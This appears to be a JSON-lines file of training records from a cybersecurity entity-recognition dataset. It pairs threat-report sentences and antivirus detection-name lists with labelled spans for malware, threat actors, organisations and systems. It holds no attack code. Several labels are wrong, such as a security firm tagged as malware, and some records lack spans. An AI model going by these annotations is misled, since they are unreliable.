{"text": "Shamoon is designed to destroy computer hard drives by wiping the master boot record MBR and data irretrievably, unlike ransomware, which holds the data hostage for a fee.", "spans": {"MALWARE: Shamoon": [[0, 7]], "SYSTEM: the master boot record MBR": [[62, 88]], "MALWARE: ransomware,": [[120, 131]]}, "info": {"id": "cyner2_train_000814", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Turla Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Turla Backdoor.Win32.Turla.u Trojan.Win32.FKM.evjxqd Backdoor.W32.Turla!c Win32.Backdoor.Turla.Agvc W32/Trojan.GDRU-3141 Trojan.Win32.Z.Turla.37892 Backdoor.Win32.Turla.u Trojan:Win32/Ouftap.B W32/Turla.TCW!tr.bdr Backdoor.Turla Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000815", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Cabby.379904 Trojan.Mauvaise.SL1 Ransom.Maktub Trojan/Filecoder.MaktubLocker.b W32/Trojan2.PUUQ Ransom_HPLOCKY.SME Trojan-Downloader.Win32.Cabby.zipxi Trojan.Win32.Cabby.ejsael Troj.Downloader.W32.Cabby.tnvB TrojWare.Win32.Cabby.SA Trojan.Encoder.7386 Downloader.Cabby.Win32.1866 Ransom_HPLOCKY.SME BehavesLike.Win32.ICLoader.fc W32/Trojan.RLTC-3878 TrojanDownloader.Cabby.coy Trojan[Downloader]/Win32.Cabby Trojan-Downloader.Win32.Cabby.zipxi Trojan/Win32.Locky.R192278 TrojanDownloader.Cabby Win32/Filecoder.MaktubLocker.B Trojan.DL.Cabby! 
Trojan.FileCryptor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000817", "source": "cyner2_train"}} {"text": "Based on the mutexes and domain names of some of their C C servers, BlackTech's campaigns are likely designed to steal their target's technology.", "spans": {"THREAT_ACTOR: BlackTech's campaigns": [[68, 89]], "ORGANIZATION: technology.": [[134, 145]]}, "info": {"id": "cyner2_train_000819", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ChePro Win32.Trojan.WisdomEyes.16070401.9500.9810 Trojan-Banker.Win32.ChePro.ink Trojan.Win32.ChePro.eihuuw Trojan.Win32.Z.Banker.266752 Trojan.PWS.Banker1.15002 BehavesLike.Win32.Worm.dc Trojan.Banker.ChePro.ctf TR/Spy.Banker.hgsvz Trojan.Renos.96 Trojan-Banker.Win32.ChePro.ink Trojan:Win32/Tombrep.B Trojan/Win32.Banload.C579920 TrojanBanker.ChePro Trj/GdSda.A Win32.Trojan.Spy.Ebgv W32/Banker.ABMA!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000821", "source": "cyner2_train"}} {"text": "Proofpoint recently observed a targeted email campaign attempting a spearphishing attack using a Game of Thrones lure.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "THREAT_ACTOR: a targeted email campaign": [[29, 54]], "SYSTEM: a Game of Thrones": [[95, 112]]}, "info": {"id": "cyner2_train_000825", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Trojan.WisdomEyes.16070401.9500.9727 Heur.Corrupt.PE Trojan.Win32.Refpron Packed.Koblu.adu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000826", "source": "cyner2_train"}} {"text": "The blog describes an incident that took place in late September of 2022.", "spans": {}, "info": {"id": "cyner2_train_000831", "source": "cyner2_train"}} {"text": "Using powerful filters, various methods of communication with its operators and an interesting persistence technique, it aims to exfiltrate selected files from governmental and public institutions, 
which are mostly focused on economic growth and cooperation in Central and Eastern Europe.", "spans": {"THREAT_ACTOR: operators": [[66, 75]], "ORGANIZATION: governmental": [[160, 172]], "ORGANIZATION: public institutions,": [[177, 197]]}, "info": {"id": "cyner2_train_000833", "source": "cyner2_train"}} {"text": "Our published investigations have now confirmed at least 19 individuals targeted with NSO in Mexico, including lawyers, politicians, journalists, anti-corruption activists, scientists, public health campaigners, government officials, and their family members.", "spans": {"ORGANIZATION: individuals": [[60, 71]], "ORGANIZATION: NSO": [[86, 89]], "ORGANIZATION: lawyers, politicians, journalists, anti-corruption activists, scientists, public health campaigners, government officials,": [[111, 233]], "ORGANIZATION: family members.": [[244, 259]]}, "info": {"id": "cyner2_train_000834", "source": "cyner2_train"}} {"text": "The Windows bot's spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection.", "spans": {"SYSTEM: Windows": [[4, 11]], "MALWARE: bot's": [[12, 17]], "MALWARE: Mirai": [[39, 44]], "MALWARE: Mirai bots": [[92, 102]], "SYSTEM: Linux host": [[108, 118]], "SYSTEM: Windows host": [[126, 138]]}, "info": {"id": "cyner2_train_000835", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanAPT.Garveep.MUE.DR4 TROJ_TAPAOUX.B Win32.Trojan.WisdomEyes.16070401.9500.9680 Backdoor.Trojan TROJ_TAPAOUX.B Trojan.Win32.Drop.bgdoxj Trojan.Win32.Tapaoux.357344 Trojan.MulDrop1.12202 Trojan.Win32.Pincav W32/Trojan.TEGY-1102 Trojan:Win32/Tapaoux.A TR/Tapaoux.A.3 Trojan[Backdoor]/Win32.Tusha Trojan:Win32/Tapaoux.A Dropper/Win32.Mudrop.C58765 Trojan.Tapaoux.A Win32/Trojan.Dropper.663", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000840", "source": "cyner2_train"}} {"text": "They are bolder and more reckless than 
their more experienced veteran counterparts.", "spans": {}, "info": {"id": "cyner2_train_000845", "source": "cyner2_train"}} {"text": "The criminals are also relying on a network of hacked servers to perform the multi-stage infection chain.", "spans": {"THREAT_ACTOR: criminals": [[4, 13]], "SYSTEM: hacked servers": [[47, 61]]}, "info": {"id": "cyner2_train_000847", "source": "cyner2_train"}} {"text": "Periodically Necurs goes offline and during these periods we typically see Locky activity decrease drastically.", "spans": {}, "info": {"id": "cyner2_train_000848", "source": "cyner2_train"}} {"text": "This particular ransomware appeared in 2014 when the operators of the Reveton Windows screen-locking ransomware decided to branch out and create an Android counterpart, which they began advertising on Russian-speaking hacking forums.", "spans": {"MALWARE: ransomware": [[16, 26]], "THREAT_ACTOR: operators": [[53, 62]], "MALWARE: the Reveton Windows screen-locking ransomware": [[66, 111]], "SYSTEM: Android": [[148, 155]], "THREAT_ACTOR: Russian-speaking hacking forums.": [[201, 233]]}, "info": {"id": "cyner2_train_000849", "source": "cyner2_train"}} {"text": "The White House and Department of State are two of the most spectacular known victims.", "spans": {"ORGANIZATION: The White House and Department of State": [[0, 39]]}, "info": {"id": "cyner2_train_000850", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.2E84 Trojan.Facebook.VP Trojan.Chromex!ZGfUkXSe3KA Worm.Win32.Febipos.da Trojan:W32/Febipos.A Trojan.FBookCRTD.Win32.1277 Worm/Febipos.h TR/Drop.Febipos.E.7 Worm/Win32.Febipos.da Trojan/Win32.Febipos.N1033287704 TrojanDropper:Win32/Febipos.E Win32.Trojan.Falsesign.Pcib Trojan.Chromex!ZGfUkXSe3KA Trojan.Win32.Spy Stolen.D87 Trj/Thymus.J Win32/Trojan.357", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000851", "source": "cyner2_train"}} {"text": "This case study contains information from an engagement that the RSA 
Incident Response IR team worked during the September to October 2013 timeframe.", "spans": {"ORGANIZATION: RSA Incident Response IR team": [[65, 94]]}, "info": {"id": "cyner2_train_000852", "source": "cyner2_train"}} {"text": "A backdoor also known as: Packed.Win32.TDSS!O RiskWare.Tool.CK Trojan.Win32.AutoRun.omsr W32.SillyDC TROJ_LOSABEL.SMD Trojan.Killav-157 Worm.Win32.AutoRun.rpm Worm.Win32.Autorun.74752.D[h] PE:Worm.Win32.DownLoad.jy!1075170189 Worm.Win32.AutoRun.~KZI Worm.AutoRun.Win32.89087 TROJ_LOSABEL.SMD BehavesLike.Win32.Downloader.cm Worm/Win32.AutoRun TrojanDownloader:Win32/Losabel.G Worm/Win32.AutoRun Downloader.Rozena", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000853", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.DNGuard", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000854", "source": "cyner2_train"}} {"text": "In the multiple incidents we have been involved in, the group has relied heavily on BeEF and Cobalt Strike.", "spans": {"THREAT_ACTOR: the group": [[52, 61]], "MALWARE: BeEF": [[84, 88]], "MALWARE: Cobalt Strike.": [[93, 107]]}, "info": {"id": "cyner2_train_000855", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.RP.E74F56 BKDR_INJECT.SMA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_INJECT.SMA Win.Trojan.Downloader-50333 TrojWare.Win32.Downloader.Inject.~E Trojan.DownLoad3.17548 Backdoor.Win32.Nbdd W32/Trojan.LFAS-4542 Trojan[Downloader]/Win32.Small TrojanDropper:Win32/Surin.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000857", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Mepaow.21127168 Trojan.Win32.Mepaow!O Trojanpws.Qqpass.16554 Trojan/Mepaow.mwv Win32.Trojan.WisdomEyes.16070401.9500.9707 Win32/Oflwr.A!crypt HV_MEPAOW_CI053B4B.RDXN Win32.Trojan.FlyStudio.F Trojan.Win32.Mepaow.mwv Trojan.Win32.Mepaow.dbtqtp Trojan.Win32.A.Mepaow.647168.A 
Troj.W32.Mepaow.mwv!c Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R Trojan.MulDrop3.13823 Trojan.Mepaow.Win32.1575 Packed.PePatch.hiy Trojan/Win32.Mepaow Trojan.Buzy.33 Trojan.Win32.Mepaow.mwv Trojan:Win32/Rusparail.A Trojan.Mepaow Trj/CI.A Win32.Trojan.Spy.Pbpm Trojan.Mepaow!GQd1AlSBw3E W32/QQPass.ELG!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000859", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.TRSpy Trojan.DownLoader4.63572 Trojan/Win32.ADH Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000860", "source": "cyner2_train"}} {"text": "Many of these domains are compromised legitimate websites, and will automatically expire from this pulse within a month.", "spans": {}, "info": {"id": "cyner2_train_000861", "source": "cyner2_train"}} {"text": "add a guard code to monitor its own processes,", "spans": {}, "info": {"id": "cyner2_train_000862", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Onlinegames.P.mue Backdoor.Bot/Variant Trojan/Farfli.aag Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Inject.brokcs TrojWare.Win32.Farfli.S Trojan.DownLoad3.17387 BehavesLike.Win32.Virut.qh Win32.Troj.Injector.GD.kcloud Trojan.Graftor.DEF08 W32.W.Otwycal.kYP3 Trojan.Scar Win32/Farfli.AAG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000863", "source": "cyner2_train"}} {"text": "The early targets: a vast number of US military and government networks, including Wright Patterson and Kelly Air Force Bases, the Army Research Lab, the Naval Sea Systems Command in Indian Head, Maryland, NASA, and the Department of Energy labs.", "spans": {"ORGANIZATION: US military": [[36, 47]], "ORGANIZATION: government networks,": [[52, 72]], "ORGANIZATION: Wright Patterson": [[83, 99]], "ORGANIZATION: Kelly Air Force Bases, the Army Research Lab, the Naval Sea Systems Command in Indian Head, Maryland, NASA,": [[104, 211]], "ORGANIZATION: the 
Department of Energy labs.": [[216, 246]]}, "info": {"id": "cyner2_train_000866", "source": "cyner2_train"}} {"text": "Poseidon scans the memory for running processes and employs keystroke logging to gather payment card data and credentials.", "spans": {"MALWARE: Poseidon": [[0, 8]], "MALWARE: keystroke logging": [[60, 77]]}, "info": {"id": "cyner2_train_000867", "source": "cyner2_train"}} {"text": "This week Proofpoint researchers observed several noteworthy changes in the macros used by an actor we refer to as TA530, who we previously examined in relation to large-scale personalized malware campaigns", "spans": {"ORGANIZATION: Proofpoint researchers": [[10, 32]], "MALWARE: macros": [[76, 82]], "THREAT_ACTOR: an actor": [[91, 99]], "THREAT_ACTOR: TA530,": [[115, 121]], "THREAT_ACTOR: large-scale personalized malware campaigns": [[164, 206]]}, "info": {"id": "cyner2_train_000869", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.AutoITFldE1.Worm Trojan.AutoIT.AHP Worm.AUTOIT.Tupym.A W32/Tupym.worm W32.W.AutoRun.llU2 WORM_SOHAND.SM Win32.Trojan.WisdomEyes.16070401.9500.9890 W32/Autorun.SX W32.Svich WORM_SOHAND.SM Win.Worm.Autorun-313 Virus.Win32.Virut.ce Trojan.AutoIT.AHP Trojan.AutoIT.AHP Virus.Win32.Virut.Ce Trojan.AutoIT.AHP Win32.Virut.56 Worm.Autorun.Win32.63723 Worm.Win32.AutoRun W32/Autorun.HBBB-2740 Worm/AutoRun.agto WORM/Autorun.aaer Virus/Win32.Virut.ce Trojan.AutoIT.AHP Virus.Win32.Virut.ce Trojan:Win32/Peaac.A!gfc HEUR/Fakon.mwf Trojan.AutoIT.AHP I-Worm.Autoit.EB Worm.Win32.Autorun.fnc Trojan.Autoit.ZA W32/Autoit.AHP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000870", "source": "cyner2_train"}} {"text": "Rather, it uses a technique recently reported on by SensePost, which allows an attacker to craft a specifically created Microsoft Word document, which uses the Dynamic Data Exchange DDE protocol.", "spans": {"MALWARE: SensePost,": [[52, 62]], "THREAT_ACTOR: attacker": [[79, 87]], "SYSTEM: the Dynamic 
Data Exchange DDE protocol.": [[156, 195]]}, "info": {"id": "cyner2_train_000871", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Downloader/W32.Greetyah.3584 Trojandownloader.Greetyah Downloader-BW.d Trojan/Downloader.Greetyah.b Win32/Wmpatch.B TROJ_GREETYAH.B Trojan-Downloader.Win32.Greetyah.b Trojan.Win32.Greetyah.hjbl Trojan.Win32.Downloader.3584.DU Troj.Downloader.W32.Greetyah.b!c Trojan-Downloader.Win32.Greetyah.b Trojan.Sysman Downloader.Greetyah.Win32.1 TROJ_GREETYAH.B Downloader-BW.d W32/Risk.VHLX-8577 TrojanDownloader.Greetyah.b W32.Malware.Downloader Trojan[Downloader]/Win32.Greetyah Trojan.Barys.D7C0 Trojan-Downloader.Win32.Greetyah.b TrojanDownloader:Win32/Greetyah.B Trojan/Win32.Downloader.R94251 Win32/TrojanDownloader.Greetyah.B Win32.Trojan-downloader.Greetyah.Llho Trojan.DL.Greetyah!8XCxgqzFn7g Trojan-Downloader.Win32.Tiny W32/Greetyah.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000872", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9917 Trojan.Win32.ExtenBro.dqxgxi TR/Downloader.A.15310 TrojanDownloader:MSIL/Kilim.D Trj/CI.A Win32.Trojan.Downloader.Szvb Trojan.ExtenBro! 
MSIL/ExtenBro.BS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000873", "source": "cyner2_train"}} {"text": "The exploit takes advantage of a buffer overflow vulnerability in the demo version of a program called Uploader!.", "spans": {"MALWARE: exploit": [[4, 11]], "VULNERABILITY: buffer overflow vulnerability": [[33, 62]], "MALWARE: Uploader!.": [[103, 113]]}, "info": {"id": "cyner2_train_000876", "source": "cyner2_train"}} {"text": "The subject is a series of targeted attacks against private companies around the world.", "spans": {}, "info": {"id": "cyner2_train_000878", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.CoinMiner.q Win32/CoinMiner.TD Trojan.BAT.BitMin.f Trojan.BtcMine.941 BehavesLike.Win32.Dropper.vc Trojan.Win32.CoinMiner TR/CoinMiner.nelvs Trojan.BAT.BitMin.f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000879", "source": "cyner2_train"}} {"text": "A backdoor also known as: HT_FASONG_GA250334.UVPM Win32.Trojan-PSW.OLGames.bm HT_FASONG_GA250334.UVPM Win.Worm.Fasong-5 Win32.HLLW.Fasong.1 Trojan.Scar.Win32.103683 BehavesLike.Win32.BadFile.vh Worm.Win32.Fasong Worm:Win32/Fasong.I Trojan.Zusy.D3494E W32.W.Fasong.lZpB Win32/Fasong.J Trojan.Scar!YU9FfkV5QC0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000880", "source": "cyner2_train"}} {"text": "At the time of this writing the domain is still serving malware.", "spans": {"MALWARE: malware.": [[56, 64]]}, "info": {"id": "cyner2_train_000883", "source": "cyner2_train"}} {"text": "Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net.", "spans": {}, "info": {"id": "cyner2_train_000884", "source": "cyner2_train"}} {"text": "In this article, we will describe the details of our investigation.", "spans": {}, "info": {"id": "cyner2_train_000887", "source": "cyner2_train"}} {"text": "Knownsec Security Team has followed up this incident ever since its 
happening.", "spans": {"ORGANIZATION: Knownsec Security Team": [[0, 22]]}, "info": {"id": "cyner2_train_000888", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Virus.Win32.Sality!O TrojanPWS.Vkont Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Z.Packer.40610 Troj.W32.AntiAV.lApy BehavesLike.Win32.HLLPPhilis.nc Trojan/PSW.VKont.c TR/PSW.VKont.wwdih PWS:Win32/Vkont.A Trj/StartPage.DGO Backdoor.Win32.Hupigon Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000889", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heuristic.BehavesLike.Win32.Packed.A TrojanDownloader:Win32/Whinetroe.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000891", "source": "cyner2_train"}} {"text": "The two reports describe the same cybercriminal gang which stole up to several hundreds of millions of dollars from various financial institutions.", "spans": {"THREAT_ACTOR: cybercriminal gang": [[34, 52]], "ORGANIZATION: financial institutions.": [[124, 147]]}, "info": {"id": "cyner2_train_000892", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm/W32.Wozer.23552.B Worm.Wozer W32/Wozer.h Win32.Trojan.WisdomEyes.16070401.9500.9643 W32/Wozer.F W32.Wozer.Worm Email-Worm.Win32.Wozer.h Trojan.Win32.Wozer.eokb W32.W.Wozer.h!c Win32.Worm-email.Wozer.Wozu Worm.Win32.Wozer.H Win32.HLLW.Wozer.4 Worm.Wozer.Win32.11 BehavesLike.Win32.Backdoor.mc Backdoor.Win32.Optix I-Worm.Wozer.c Worm:Win32/Wozer.G@mm Worm[Email]/Win32.Wozer Worm.Wozer.h.kcloud Email-Worm.Win32.Wozer.h Worm:Win32/Wozer.G@mm Trojan/Win32.Rirc.R100483 Email-Worm.Wozer W32/Wozer.C.worm Win32/Wozer.H Worm.Wozer!/x/Vuw7rp3c W32/Wozer.H@mm Win32/Worm.Email-Worm.795", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000893", "source": "cyner2_train"}} {"text": "This post discusses our findings and potential security risks to iOS device users.", "spans": {"VULNERABILITY: 
potential security risks": [[37, 61]], "SYSTEM: iOS device": [[65, 75]], "ORGANIZATION: users.": [[76, 82]]}, "info": {"id": "cyner2_train_000894", "source": "cyner2_train"}} {"text": "A backdoor also known as: Rootkit.27428 Trojan/W32.Rootkit.71040 Rootkit.27428 Backdoor.Rustock Rootkit.D6B24 Win32.Trojan.WisdomEyes.16070401.9500.9984 Hacktool.Rootkit Rootkit.27428 Rootkit.27428 Rootkit.27428 BehavesLike.Win32.Virut.kc Win32.Troj.Undef.kcloud Backdoor.Rustock Trojan.Win32.Rootkit Win32/RootKit.Rootkit.3e8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000895", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Kalockan Trojan.Graftor.D46F63 Win32.Trojan.WisdomEyes.16070401.9500.9926 Trojan.Win32.Z.Graftor.143360.EV BackDoor.Tdss Worm.Win32.Kalockan Worm:Win32/Kalockan.A Trj/CI.A Win32/Trojan.621", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000897", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Backdoor.Ciadoor.13.3 W32/VB-Dropper-based.2!Maximus Backdoor.Ciadoor BKDR_CIAD1.TOMA Backdoor.Win32.Ciadoor.cvi Backdoor.Win32.Ciadoor!IK Backdoor.Win32.Ciadoor.G Trojan.DownLoader.62487 BDS/Ciadoor.13.4 BKDR_CIAD1.TOMA Backdoor/Ciadoor.130 TrojanDropper:Win32/Ciadoor.C W32/VB-Dropper-based.2!Maximus Backdoor.Ciadoor.cvi Backdoor.CiaDoor.13 Backdoor.Win32.Ciadoor W32/Ciadoor.V13!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000899", "source": "cyner2_train"}} {"text": "Using privilege escalation", "spans": {"VULNERABILITY: privilege escalation": [[6, 26]]}, "info": {"id": "cyner2_train_000901", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Ursus.A Backdoor/W32.Ursus.3072 BKDR_URSUS.A Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_URSUS.A Win.Trojan.Ursus-1 Backdoor.Ursus.A Backdoor.Win32.Ursus Backdoor.Ursus.A Trojan.Win32.Ursus.ehmu Backdoor.Win32.Ursus.3072 Backdoor.W32.Ursus!c Backdoor.Ursus.A 
Backdoor.Win32.Ursus.A Backdoor.Ursus.A BACKDOOR.Trojan Backdoor.Ursus.Win32.1 W32.Trojan.Trojan-Backdoor-Ursu Trojan[Backdoor]/Win32.Ursus Backdoor.Ursus.A Backdoor.Win32.Ursus Backdoor:Win32/Ursus.A Backdoor.Ursus.A Backdoor.Ursus Bck/Ursus.B Win32/Ursus.A Win32.Backdoor.Ursus.Wvkp Backdoor.Ursus!H8M0lbEN7e8 Trojan.Win32.Ursus W32/Ursus.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000902", "source": "cyner2_train"}} {"text": "Downeks uses third party websites to determine the external IP of the victim machine, possibly to determine victim location with GeoIP.", "spans": {"SYSTEM: machine,": [[77, 85]]}, "info": {"id": "cyner2_train_000904", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.Paradise W32/Trojan.PLFO-2827 Ransom_Paradiz.R029C0DAC18 MSIL.Trojan-Ransom.Paradise.A Trojan.Win32.Encoder.exgjts Trojan.Encoder.14933 Ransom_Paradiz.R029C0DAC18 TR/FileCoder.gourg Ransom:MSIL/Paradiz.A!bit Ransom.FileCryptor Trj/GdSda.A Trojan.Filecoder!HVBN1jZrlCU MSIL/Paradise.A!tr.ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000906", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Tapazom Trojan.Heur.E5D2E1 Win32.Trojan.WisdomEyes.16070401.9500.9901 Trojan.Win32.Winlock.crkzwj Win32.Backdoor.Tapazom.Hrfh Trojan.Winlock.7759 Trojan.Delf.Win32.59125 Backdoor.Win32.Tapazom W32/Trojan.HYVM-8493 BDS/Tapazom.A.82 Trojan[Ransom]/Win32.Blocker Backdoor:Win32/Tapazom.A HEUR/Fakon.mwf Trojan.Blocker!KkFY0lqXiEM Win32/Trojan.e5e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000907", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.MSIL.Zapchast.akhiw Trojan/MSIL.Zapchast Trojan.Strictor.D1662C Trojan.MSIL.Zapchast.akhiw W32/Zapchast.AKHIW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000908", "source": "cyner2_train"}} {"text": "A backdoor 
also known as: Trojan/W32.Flooder.581632 W32/Trojan.GGXC-4249 Hacktool.Flooder TROJ_DRBLAST.A Email-Flooder.Win32.DirectBlaster.651 Trojan.Win32.DirectBlaster.dggz Email-Flooder.W32.DirectBlaster.651!c Trojan.PWS.Hukle.67 TROJ_DRBLAST.A W32/Trojan.AFHI Flooder.DirectBlaster.b TR/Flood.DirectBlaster.651 HackTool[Flooder]/Win32.DirectBlaster Spammer:Win32/DirectBlaster.6_51 Email-Flooder.Win32.DirectBlaster.651 EmailFlooder.DirectBlaster Flooder/DBlaster.B Win32.Trojan.Directblaster.Wrqh Flooder.DirectBlaster!mE1A4daHzRk Malware_fam.gw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000910", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Backdoor.Trojan BehavesLike.Win32.BadFile.ht TrojanDropper:Win32/Fedripto.A Trojan.Buzy.DD86 Win32/Backdoor.e9a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000911", "source": "cyner2_train"}} {"text": "However, Unit 42 has recently discovered the actors have continued to evolve their custom malware arsenal.", "spans": {"ORGANIZATION: Unit 42": [[9, 16]], "THREAT_ACTOR: actors": [[45, 51]], "MALWARE: custom malware arsenal.": [[83, 106]]}, "info": {"id": "cyner2_train_000914", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9931 W32/Trojan2.HLRY W32.W.Fearso.kYUv Trojan.DownLoader5.44969 BehavesLike.Win32.Rootkit.ph W32/Trojan.LZVM-6897 Trojan:Win32/Lukicsel.A W32/Dx.TOC!tr Win32/Trojan.c9e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000915", "source": "cyner2_train"}} {"text": "Just starting to see the second run of today's Trickbot downloaders coming in.", "spans": {"MALWARE: Trickbot downloaders": [[47, 67]]}, "info": {"id": "cyner2_train_000916", "source": "cyner2_train"}} {"text": "Sofacy also known as Fancy Bear Sednit STRONTIUM and APT28 is an advanced threat group that has been active since around 2008, targeting mostly military and 
government entities worldwide, with a focus on NATO countries.", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "THREAT_ACTOR: Fancy Bear": [[21, 31]], "THREAT_ACTOR: Sednit": [[32, 38]], "THREAT_ACTOR: STRONTIUM": [[39, 48]], "THREAT_ACTOR: APT28": [[53, 58]], "THREAT_ACTOR: advanced threat group": [[65, 86]], "ORGANIZATION: military": [[144, 152]], "ORGANIZATION: government entities": [[157, 176]]}, "info": {"id": "cyner2_train_000918", "source": "cyner2_train"}} {"text": "A backdoor also known as: TR/RedCap.dtrps Exploit:Win32/Spectre.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000919", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.EB9A Trojan/AutoRun.VB.ahf W32/Risk.HKZN-7619 Worm.AutoRun.Win32.41218 W32/MalwareF.MDOM Trojan/Refroso.alid TR/Comitsproc.whlbv Trojan/Win32.Scar.R211104 TScope.Trojan.VB Trj/CI.A Win32.Worm.Autorun.Dyzv Worm.AutoRun!QjN27yFtykA Worm.Win32.AutoRun W32/AutoRun.RPV!worm Win32/Trojan.df1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000921", "source": "cyner2_train"}} {"text": "On 29 March 2017 the German Federal Office for Information Security BSI said in a statement that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party.", "spans": {"ORGANIZATION: German Federal Office for Information Security BSI": [[21, 71]], "ORGANIZATION: Israeli newspaper Jerusalem Post": [[112, 144]]}, "info": {"id": "cyner2_train_000922", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus/W32.Induc Virus.Induc.Win32.1 W32.W.Deecee.lrKT Trojan.Induc.1 Win32.Virus.Induc.a W32/Trojan2.GROR W32.Induc.A Win32/Nedsym.C PE_INDUC.A Win.Virus.Induc-2 Virus.Win32.Induc.b Virus.Win32.Induc.dffkeg Win32.Induc.A Virus.Win32.Induc.A0 Win32.Induc PE_INDUC.A Trojan-Spy.Win32.Banker W32/Trojan.QGYF-1386 Win32/Induc.a W32/Induc.blr Trojan[Spy]/Win32.KeyLogger Win32.Induc.b.820224 Trojan:Win32/Nedsym.F Virus.Win32.Induc.b 
